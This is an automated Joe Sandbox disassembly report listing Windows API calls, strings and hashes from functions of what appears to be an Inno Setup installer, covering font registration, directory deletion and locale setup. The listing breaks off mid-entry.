                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                            • String ID: Deleting Uninstall data files.
                                                            • API String ID: 1570157960-2568741658
                                                            • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                            • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                            • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                            • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                            • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                            Strings
                                                            • Failed to open Fonts registry key., xrefs: 00470529
                                                            • AddFontResource, xrefs: 0047055D
                                                            • Failed to set value in Fonts registry key., xrefs: 00470514
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                            • API String ID: 955540645-649663873
                                                            • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                            • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                            • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                            • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                            APIs
                                                              • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                              • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                              • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                            • GetVersion.KERNEL32 ref: 004631CC
                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                            • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                            • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                            • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                            • String ID: Explorer
                                                            • API String ID: 2594429197-512347832
                                                            • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                            • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                            • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                            • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02172BE0,?,?,?,02172BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02172BE0,?,?,?,02172BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02172BE0,?,?,?,02172BE0), ref: 004782E8
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02172BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                            • API String ID: 2704155762-2318956294
                                                            • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                            • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                            • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                            • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                            APIs
                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                            • LocalFree.KERNEL32(00623FC0,00000000,00401B68), ref: 00401ACF
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,00623FC0,00000000,00401B68), ref: 00401AEE
                                                            • LocalFree.KERNEL32(00624FC0,?,00000000,00008000,00623FC0,00000000,00401B68), ref: 00401B2D
                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                            • String ID: Ub
                                                            • API String ID: 3782394904-2151759353
                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                              • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                            Strings
                                                            • Deleting directory: %s, xrefs: 0045A1BF
                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                            • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                            • Stripped read-only attribute., xrefs: 0045A1F8
                                                            • Failed to strip read-only attribute., xrefs: 0045A204
                                                            • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorFindLast
                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                            • API String ID: 754982922-1448842058
                                                            • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                            • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                            • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                            • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                            APIs
                                                            • GetCapture.USER32 ref: 00422EB4
                                                            • GetCapture.USER32 ref: 00422EC3
                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                            • ReleaseCapture.USER32 ref: 00422ECE
                                                            • GetActiveWindow.USER32 ref: 00422EDD
                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                            • GetActiveWindow.USER32 ref: 00422FCF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                            • String ID:
                                                            • API String ID: 862346643-0
                                                            • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                            • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                            • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                            • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                            APIs
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                            • GetActiveWindow.USER32 ref: 0042F2EA
                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                            • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$ActiveLong$Message
                                                            • String ID:
                                                            • API String ID: 2785966331-0
                                                            • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                            • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                            • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                            • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                            APIs
                                                            • 73E9A570.USER32(00000000), ref: 0042949A
                                                            • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                            • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                            • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                            • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                            • String ID:
                                                            • API String ID: 361401722-0
                                                            • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                            • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                            • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                            • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                            APIs
                                                            • 73E9A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                            • 73EA4620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                            • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                            • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                            • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ObjectStock$A4620A480A570IconLoad
                                                            • String ID:
                                                            • API String ID: 2905290459-0
                                                            • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                            • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                            • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                            • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                            APIs
                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                            • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load
                                                            • String ID: $ $Internal error: Item already expanding
                                                            • API String ID: 1675784387-1948079669
                                                            • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                            • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                            • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                            • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                            • API String ID: 390214022-3304407042
                                                            • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                            • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                            • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                            • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                            APIs
                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                            • 73EA59E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                            • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ClassInfoMessageSend
                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                            • API String ID: 1455646776-4234151509
                                                            • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                            • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                            • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                            • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                            APIs
                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                              • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale$DefaultSystem
                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                            • API String ID: 1044490935-665933166
                                                            • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                            • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                            • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                            • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                              • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                              • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                            • String ID: ,$?
                                                            • API String ID: 2359071979-2308483597
                                                            • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                            • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                            • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                            • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
